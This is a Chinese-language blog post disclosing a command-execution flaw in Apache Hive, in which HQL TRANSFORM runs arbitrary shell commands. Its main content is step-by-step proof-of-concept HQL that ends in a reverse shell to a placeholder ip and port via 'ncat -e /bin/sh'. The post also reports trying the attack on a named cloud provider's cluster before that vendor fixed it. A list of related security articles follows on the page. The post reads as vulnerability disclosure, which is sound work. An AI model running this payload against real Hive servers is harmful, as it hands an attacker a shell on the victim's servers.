Hive任意命令/代码执行漏洞+渗透实例

最新推荐文章于 2023-05-04 11:28:01 发布
最新推荐文章于 2023-05-04 11:28:01 发布
阅读量564 收藏
点赞数
分类专栏: 安全

Author: kindle
Date: 2013-02-9

Hive是建立在 Hadoop 上的数据仓库基础构架。它提供了一系列的工具,可以用来进行数据提取转化加载(ETL),这是一种可以存储、查询和分析存储在 Hadoop 中的大规模数据的机制。Hive 定义了简单的类 SQL 查询语言,称为 QL,它允许熟悉 SQL 的用户查询数据。同时,这个语言也允许熟悉 MapReduce 开发者的开发自定义的 mapper 和 reducer 来处理内建的 mapper 和 reducer 无法完成的复杂的分析工作。

漏洞详情

HQL可以通过transform自定义Hive使用的 Map/Reduce 脚本,从而调用shell/python等语言,切默认皆可用,没提供禁用方式。导致攻击者可以通过hive接口等相关操作方式直接获取服务器权限

测试代码

新建/root/test文件,内容是1(或者任意int型数字)
创建测试表
create table if not exists kindle(id int);
导入数据(这步很关键,没数据无法触发漏洞)
load data local inpath ‘/root/test’ INTO TABLE kindle;
通过transform来自定义hive使用的shell命令,反弹shell
select transform(id) USING ‘/usr/bin/ncat -e /bin/sh ip port’ from kindle;
删除测试表
drop table kindle;

 

漏洞状态

通知了部分大公司,尚未联系官方

 

————————————————————————————-邪恶的分割线————————————————————————————-

 

实战案例

测试Treasure Data集群(Hadoop-based Big Data as a Service on the Cloud | Treasure Data)

过程

未命名

未命名

 

修复状态

已经通知Treasure Data官方,修补好了,如下图官方的回复

QQ截图20130217093153

 

chinalgf
关注
专栏目录
[网络安全自学篇] 八十四.《Windows黑客编程技术详解》之VS环境配置、基础知识及DLL延迟加载详解(1)
杨秀璋的专栏
06-19 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第一篇文章主要包括两部分内容,开发环境(VS、编译设置)、基础技术、运行单一实例(互斥对象示例)、DLL延迟加载(skin++换皮肤示例)、资源释放(MFC示例)。希望对您有所帮助~
第十一天任意代码执行漏洞
代码审计
03-16 1492
这里写目录标题一级目录二级目录三级目录 一级目录 二级目录 三级目录 在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞代码执行命令执行 代码执行 后端语言执行 php java .net nodejs 命令执行 调用系统接口 面试喜欢问 代码执行常见的函数 代码执行各函数之间的特点 代码执行如何修复 bypass disable fu nctiO
Hive3.1.2-Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)修复方法
等风来
05-04 523
其中,log4j-api-*.jar、log4j-core-*.jar是需要替换的。
网络逻辑漏洞、SQLMAP、Nmap、burpsuite及其命令的使用方法
weixin_65695770的博客
04-07 4195
SQLMAP sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 sqlmap支持五种不同的注入模
网络安全渗透
李子木的博客
04-04 8585
Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 Sqlmap安装 (1)安装sqlmap前,需要.
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8011
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
网络渗透.
L3546419161的博客
03-25 3641
PowerSploit是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell的攻击脚本,它们主要用于渗透中的信息侦测,权限提升、权限维持等。PowerSploit项目地址:https://github.com/PowerShellMafia/PowerSploit 下载PowerSploit脚本到服务器,搭建一个简易的WEB服务器。将PowerSploit目录放到WEB目录,使其可以通过HTTP访问到。 这里以kali服务器为例,介绍两种方式 第一种方式: 开启apache服务:s
命令执行漏洞
Jim的博客
09-29 1114
Apache Airflow Hive Provider <5.0.0 存在操作系统命令注入漏洞
OSCS开源安全社区
12-22 450
Apache Airflow Hive Provider 在 5.0.0 之前的版本中由于对airflow/providers/apache/hive/hooks/hive.py文件中hive_cli_params参数不正确初始化,导致存在操作系统命令注入漏洞。OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。将组件 apache-airflow-providers-apache-hive 升级至 5.0.0 及以上版本。
某产品巧妙的命令执行漏洞
一个码农的笔记
03-26 899
最近在做内部产品的代码审计,发现一处有趣的地方,我把关键代码提取出来,供大家学习思路 <? if(array_key_exists('type',$_REQUEST)){ $type = $_REQUEST['type']; } if(array_key_exists('sha1',$_REQUEST)){ $sha1 = $_REQUEST['sha...
Bash 远程任意代码执行安全漏洞(最严重漏洞
weixin_34221332的博客
09-25 408
Bash 远程任意代码执行安全漏洞(最严重漏洞)http://www.oschina.net/news/55576/bourne-again-shell-bash-remote-code-execution-vulnerabilityhttp://www.antiy.com/response/bash.html 转载于:https://blog.5...
Apache Airflow Hive Provider 任意Hive命令执行漏洞
murphysec的博客
03-01 460
Apache Airflow 是一个以编程方式管理 workflow 的平台,Airflow Hive Provider 是一个使用 SQL 进行读取、写入和管理分布式存储中的大型数据集的工具包,_prepare_cli_cmd 方法用于创建 Hive 连接命令列表。 由于 Airflow Hive Provider 5.1.3 之前版本中的 hive#_prepare_cli_cmd 方法未对用户传入的数据库连接参数(conn)有效过滤,攻击者可以恶意构造 Hive 连接参数传递到 jdbc_url 中
漏洞预警|Apache Airflow Hive Provider命令注入漏洞
LJQClqjc的博客
11-22 769
棱镜七彩安全预警
orc文件导致hiveserver2的内存泄漏
wm_1002的博客
01-03 733
CDH6.0.1 hive orc导致内存增长问题解决
常用的端口及未授权访问漏洞
小城的博客
02-15 6516
​ 一、介绍 用于快速定位端口,查找开放端口脆弱点,有利于外网渗透 1.1 具体端口 端口号 使用 弱点 21 telnet 22 SSH 28退格漏洞、OpenSSL漏洞 25 SMTP协议 53 DNS服务 67&68 DHCP服务 143 IMAP协议 161 SNMP协议 DHCP劫持 1443 mssql 1521 oracle 2049 NFS服务 2181 Zookeeper ### Zookeeper未授权
HiveServer2 内存泄漏问题定位与优化方案
字节跳动技术团队官方博客
09-09 3903
动手点关注 干货不迷路 ????前言HiveServer2 属于 Hive 组件的一个服务,主要提供 Hive 访问接口,例如可通过 JDBC 的方式提交 Hive 作业,HiveServer2 基于 Java 开发,整个服务运行过程中,内存的管理回收均由 JVM 进行控制。在 JVM 语言中的内存泄漏与 C/C++ 语言的内存泄漏会有些差异,JVM 的内存泄漏更多的是业务代码逻辑错误引起大量对象引用被...
$HIVE_HOME/bin/hive --service hiveserv补全命令
最新发布
05-10
$HIVE_HOME/bin/hive --service hiveserver是启动HiveServer2的命令。在启动HiveServer2时,可以添加一些参数来控制其行为,这些参数的完整列表可以通过在命令行中输入$HIVE_HOME/bin/hive --service hiveserver2 --help来查看。其中一些常用的参数包括: - -p 或 --port 指定HiveServer2监听的端口号,默认为10000 - -H 或 --hostname 指定HiveServer2绑定的主机名,默认为0.0.0.0 - --hiveconf key=value 设置Hive配置属性,例如--hiveconf hive.server2.authentication=LDAP可以启用LDAP认证 - --hivevar key=value 设置Hive变量,例如--hivevar database=my_db可以在HQL语句中引用${hivevar:database}来代替my_db 同时,还可以通过添加--hiveconf hive.server2.thrift.port=<port_number>来启动HiveServer1。在这种情况下,端口号需要设置为9083。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值